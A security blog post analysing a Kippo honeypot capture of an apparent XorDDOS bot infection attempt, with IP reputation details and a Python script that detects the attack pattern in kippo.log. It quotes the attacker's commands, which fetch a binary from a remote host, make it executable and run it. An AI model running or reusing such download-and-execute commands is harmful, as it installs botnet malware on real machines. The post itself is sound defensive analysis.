Kippo Honeypot Attack – Linux XorDDOS malware

So I have had my Kippo honeypot running for a while and got some pretty good statistics from it. But after a while I got bored and turned it all off.
I decided to fire it back up again and got some interesting hits from 125.88.177.248.
It seems to be trying to execute some Linux/XorDDOS malware, according to the guys over at malwaremustdie.org.

“… the post-infection of this malware made the infected machine act as a bot, remotely controlled for malicious process, config, deny IP, daemon and configurations. They are using XOR’ed encryption communication, processes are sent with md5 encoded beforehand. The main function of this malware ELF is for a stealth DDoS attacker botnet.”

As you can see from my SIEM, this IP is on the OTX register and it's known as malicious.
Basic info for this IP:

Guangzhou, China

ASN/OWNER: AS58543 Guangdong

FIRST SEEN: Jan. 4, 2016, 8:31 am

LAST SEEN: Jan. 6, 2016, 7:26 am

https://otx.alienvault.com/indicator/ip/125.88.177.248/?utm_source=OSSIM&utm_medium=analysis%252Fsecurity_events%252Fsecurity_events&utm_campaign=5.2.0

[Screenshot: SSH Kippo Honeypot]

So we can see on the SIEM it's detected the hits coming in. I've allowed the connection to pass the firewall as it's going into my DMZ on a specific port.

It connects with the default honeypot admin/123456 login and tries the following commands:

“#! /bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget hXXp://107.178.93.23/abf/f13
chmod +x f13
./f13”

(I've edited the URL to say hXXp so there isn't a live link.)

By doing this it's trying to download a file from 107.178.93.23. This IP belongs to a GoDaddy host, IOFLOD(dot)com.

The chmod +x then gives the file execute permission so that ./f13 can run it.

One thing to note is that none of this is detected in Kippo-Graph; it only registers the connection from the IP.

[Screenshot: SSH-connection]

The next thing you can see is the below screenshot.
[Screenshot: SSH-connection2]

We then get a connection back again and the following command is executed:
“ls -la /var/run/gcc.pid”
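Since Kippo-Graph only shows the connection and not what was typed after login, the useful data is in kippo.log itself, which records each command as a "CMD:" line tagged with the transport id and source IP. The following script is an added example (not part of the original post, and not Kippo's own code): it groups CMD lines per session and flags two things seen above, a download / chmod +x / execute chain and the XorDDOS "/var/run/gcc.pid" check. The log lines are constructed in the style of kippo.log using the IPs named in the post; the exact timestamps, session ids and the 10.0.0.5 control session are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample in kippo.log style (not the post's real log).
# The wget URL is kept defanged (hxxp) exactly as the post presents it.
SAMPLE_LOG = """\
2016-01-04 08:31:12+0000 [SSHService ssh-userauth on HoneyPotTransport,1,125.88.177.248] login attempt [admin/123456] succeeded
2016-01-04 08:31:13+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,125.88.177.248] CMD: PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2016-01-04 08:31:13+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,125.88.177.248] CMD: wget hxxp://107.178.93.23/abf/f13
2016-01-04 08:31:14+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,125.88.177.248] CMD: chmod +x f13
2016-01-04 08:31:14+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,125.88.177.248] CMD: ./f13
2016-01-06 07:26:02+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,2,125.88.177.248] CMD: ls -la /var/run/gcc.pid
2016-01-06 07:30:00+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,10.0.0.5] CMD: uname -a
"""

# One CMD line: timestamp, transport id (session), source IP, command text.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[.*?HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)\] CMD: (?P<cmd>.*)$"
)
DOWNLOAD_RE = re.compile(r"^(?:wget|curl)\s+(?:-\S+\s+)*(?P<url>\S+)")
CHMOD_RE = re.compile(r"^chmod\s+\+x\s+(?P<target>\S+)")
EXEC_RE = re.compile(r"^\./(?P<target>\S+)")
XORDDOS_MARKER = "/var/run/gcc.pid"   # pid file XorDDOS checks, per the MMD write-up


def parse_commands(log_text):
    """Group (timestamp, command) pairs by (source IP, transport id)."""
    sessions = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            sessions[(m["ip"], m["sid"])].append((m["ts"], m["cmd"].strip()))
    return sessions


def find_alerts(log_text):
    """Return one alert dict per suspicious pattern found in a session."""
    alerts = []
    for (ip, sid), cmds in parse_commands(log_text).items():
        downloaded = {}     # basename -> URL it was fetched from
        executable = set()  # downloaded names that were later chmod +x'ed
        for ts, cmd in cmds:
            if XORDDOS_MARKER in cmd:
                alerts.append({"ip": ip, "session": sid, "ts": ts,
                               "rule": "xorddos-gcc-pid", "detail": cmd})
            d = DOWNLOAD_RE.match(cmd)
            if d:
                name = urlsplit(d["url"]).path.rsplit("/", 1)[-1] or d["url"]
                downloaded[name] = d["url"]
                continue
            c = CHMOD_RE.match(cmd)
            if c and c["target"] in downloaded:
                executable.add(c["target"])
                continue
            e = EXEC_RE.match(cmd)
            if e and e["target"] in executable:
                # Full chain observed in order: fetch, make executable, run.
                alerts.append({"ip": ip, "session": sid, "ts": ts,
                               "rule": "download-and-execute",
                               "detail": f"{e['target']} from {downloaded[e['target']]}"})
    return alerts


if __name__ == "__main__":
    for a in find_alerts(SAMPLE_LOG):
        print(f"{a['ts']} {a['ip']} session {a['session']}: {a['rule']} ({a['detail']})")
```

The chain rule deliberately requires the same basename to appear in the download, the chmod and the execution, so an ordinary `ls` or `uname -a` session produces nothing; the gcc.pid rule is a plain substring match because that path is the specific marker the MalwareMustDie analysis ties to XorDDOS.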

[Screenshot: SSH-connection3]

This sounds very much like the malware that has been torn apart by MalwareMustDie:
http://blog.malwaremustdie.org/2015/06/mmd-0033-2015-linuxxorddos-infection_23.html

The file is also picked up by VirusTotal:
https://www.virustotal.com/en/file/c394440c56fdcda9739fbb966e9ac2eab9e11e2eeff0720eb4c850a05b33eefc/analysis/